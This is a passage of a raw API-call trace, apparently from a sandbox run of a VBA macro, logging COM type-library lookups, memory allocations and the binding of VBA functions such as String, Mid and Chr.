[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3b0 | out: ppvObject=0x1dc3b0*=0xa1216f0) returned 0x0 [0203.035] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa1216f0, memid=1610612737, invkind=1, pFuncIndex=0x1dc3f0 | out: pFuncIndex=0x1dc3f0*=0x1) returned 0x0 [0203.035] ITypeInfo2:GetFuncCustData (in: This=0xa1216f0, index=0x1, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc408 | out: pVarVal=0x1dc408*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x1055b0)) returned 0x0 [0203.038] IUnknown:Release (This=0xa1216f0) returned 0x1 [0203.038] IUnknown:AddRef (This=0xa1216f0) returned 0x2 [0203.038] ITypeInfo:LocalReleaseFuncDesc (This=0xa1216f0) returned 0x0 [0203.038] IUnknown:Release (This=0xa1216f0) returned 0x1 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc608 | out: ppvObject=0x1dc608*=0x0) returned 0x80004002 [0203.039] IUnknown:AddRef (This=0xa1216f0) returned 0x2 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc640 | out: ppvObject=0x1dc640*=0x0) returned 0x80004002 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc610 | out: ppvObject=0x1dc610*=0x0) returned 0x80004002 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc600 | out: ppvObject=0x1dc600*=0x0) returned 0x80004002 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51d0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc608 | out: ppvObject=0x1dc608*=0x0) returned 0x80004002 [0203.039] ITypeInfo:RemoteGetTypeAttr (in: This=0xa1216f0, ppTypeAttr=0x1dc638, pDummy=0x10 | out: ppTypeAttr=0x1dc638, pDummy=0x10) returned 0x0 [0203.039] ITypeInfo:LocalReleaseTypeAttr (This=0xa1216f0) returned 0x0 [0203.039] IUnknown:AddRef (This=0xa1216f0) returned 0x3 [0203.039] IUnknown:Release (This=0xa1216f0) returned 0x2 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.039] IUnknown:QueryInterface (in: This=0xa1216f0, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.039] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.040] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa1216f0, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.040] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.040] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.040] IUnknown:Release (This=0x9ab5f00) returned 0x13 [0203.040] ITypeInfo:RemoteGetDllEntry (in: This=0xa1216f0, memid=1610612737, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.040] ITypeInfo:RemoteGetDllEntry (in: This=0xa1216f0, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.040] ITypeInfo:RemoteGetDllEntry (in: This=0xa1216f0, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.040] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0203.040] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.040] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.040] GetCurrentProcess () returned 0xffffffffffffffff [0203.040] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x43) returned 1 [0203.040] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0203.041] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x3, _Src=0x63a04f2 | out: _Dst=0x1dc9f0) returned 0x0 [0203.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f740, cbMultiByte=1, lpWideCharStr=0x67811a4, cchWideChar=4 | out: lpWideCharStr="0") returned 1 [0203.041] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0203.041] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0203.041] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0203.041] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0203.041] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0203.041] IUnknown:Release (This=0xa02b108) returned 0x5 [0203.041] IUnknown:Release (This=0xa02b108) returned 0x4 [0203.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5731aca, cbMultiByte=7, lpWideCharStr=0x1dc590, cchWideChar=8 | out: lpWideCharStr="String") returned 7 [0203.041] ITypeComp:RemoteBind (in: This=0xa02b110, szName="String", lHashVal=0x10102a, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5731aca, cbMultiByte=7, lpWideCharStr=0x1dc5d0, cchWideChar=8 | out: lpWideCharStr="String") returned 7 [0203.041] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="String", lHashVal=0x10102a, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5731aca, cbMultiByte=7, lpWideCharStr=0x1dc5d0, cchWideChar=8 | out: lpWideCharStr="String") returned 7 [0203.041] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="String", lHashVal=0x10102a, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5731aca, cbMultiByte=7, lpWideCharStr=0x1dc5d0, cchWideChar=8 | out: lpWideCharStr="String") returned 7 [0203.041] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="String", lHashVal=0x10102a, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5731aca, cbMultiByte=7, lpWideCharStr=0x1dc5d0, cchWideChar=8 | out: lpWideCharStr="String") returned 7 [0203.042] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="String", lHashVal=0x10102a, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.042] IMalloc:Alloc (This=0x7fefecb5380, cb=0xe) returned 0x9653e90 [0203.042] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x7, _Src=0x5731aca | out: _Dst=0x9653e90) returned 0x0 [0203.042] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_String") returned 0x108ad3 [0203.042] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xe, _Src="_B_var_String" | out: _Dst="_B_var_String") returned 0x0 [0203.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=14, lpWideCharStr=0x1dc530, cchWideChar=14 | out: lpWideCharStr="_B_var_String") returned 14 [0203.042] IUnknown:AddRef (This=0x9ab5f00) returned 0x14 [0203.042] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_String", lHashVal=0x108ad3, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=1, pBstrLibName=0x1dc530) returned 0x0 [0203.042] IUnknown:Release (This=0x9ab5f00) returned 0x13 [0203.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_String", cchWideChar=-1, lpMultiByteStr=0x1dc6e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_String", lpUsedDefaultChar=0x0) returned 14 [0203.042] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_String") returned 0x108ad3 [0203.042] IUnknown:AddRef (This=0x9ab5f00) returned 0x14 [0203.042] IUnknown:Release (This=0x9ab5f00) returned 0x13 [0203.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a099e, cbMultiByte=14, lpWideCharStr=0x1dc590, cchWideChar=15 | out: lpWideCharStr="_B_var_String") returned 14 [0203.042] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_String", lHashVal=0x108ad3, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0xa121698, pDescKind=0x1dc55c*=1, ppFuncDesc=0x1dc560, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0203.042] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc550, pDummy=0x1 | out: ppTypeAttr=0x1dc550, pDummy=0x1) returned 0x0 [0203.042] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0203.043] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3b0 | out: ppvObject=0x1dc3b0*=0xa121698) returned 0x0 [0203.043] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612763, invkind=1, pFuncIndex=0x1dc3f0 | out: pFuncIndex=0x1dc3f0*=0x1b) returned 0x0 [0203.043] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x1b, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc408 | out: pVarVal=0x1dc408*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b, varVal2=0x108ad3)) returned 0x0 [0203.043] IUnknown:Release (This=0xa121698) returned 0x9 [0203.043] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.043] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0203.043] IUnknown:Release (This=0xa121698) returned 0x9 [0203.043] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc608 | out: ppvObject=0x1dc608*=0x0) returned 0x80004002 [0203.043] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.043] IUnknown:Release (This=0xa121698) returned 0x9 [0203.043] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.043] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.043] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.043] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.043] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.043] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.043] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.043] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612763, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.043] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612763, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.044] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612763, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.044] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0203.044] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.044] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.044] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0203.044] GetCurrentProcess () returned 0xffffffffffffffff [0203.044] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x4b) returned 1 [0203.044] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0203.044] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x3, _Src=0x63a0516 | out: _Dst=0x1dc9f0) returned 0x0 [0203.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f76c, cbMultiByte=2, lpWideCharStr=0x6781dc4, cchWideChar=6 | out: lpWideCharStr="&H") returned 2 [0203.044] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.044] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x573133a | out: _Dst=0x9653e90) returned 0x0 [0203.044] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0203.044] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.044] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.044] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.044] IUnknown:Release (This=0xa121698) returned 0x9 [0203.044] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.044] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.044] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.045] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.045] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.045] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.045] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.045] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.045] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.045] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.046] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.046] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x5732c22 | out: _Dst=0x9653e90) returned 0x0 [0203.046] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0203.046] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.046] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.046] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.046] IUnknown:Release (This=0xa121698) returned 0x9 [0203.046] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.046] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.046] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.046] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.046] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.046] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.046] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.046] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.046] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.046] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0203.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x961f7a0, cbMultiByte=2, lpWideCharStr=0x67834ae, cchWideChar=6 | out: lpWideCharStr="&H") returned 2 [0203.047] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653e90 [0203.047] _mbscpy_s (in: _Dst=0x9653e90, _DstSizeInBytes=0x4, _Src=0x573133a | out: _Dst=0x9653e90) returned 0x0 [0203.047] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Mid") returned 0x1070ed [0203.047] IUnknown:AddRef (This=0x9ab5f00) returned 0x15 [0203.047] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.047] IUnknown:AddRef (This=0xa121698) returned 0xa [0203.047] IUnknown:Release (This=0xa121698) returned 0x9 [0203.047] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0203.047] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0203.047] IMalloc:Free (This=0x7fefecb5380, pv=0x9653e90) [0203.047] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0203.047] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0203.047] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0203.047] IUnknown:Release (This=0x9ab5f00) returned 0x14 [0203.047] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0203.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0203.047] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0203.047] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612742, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 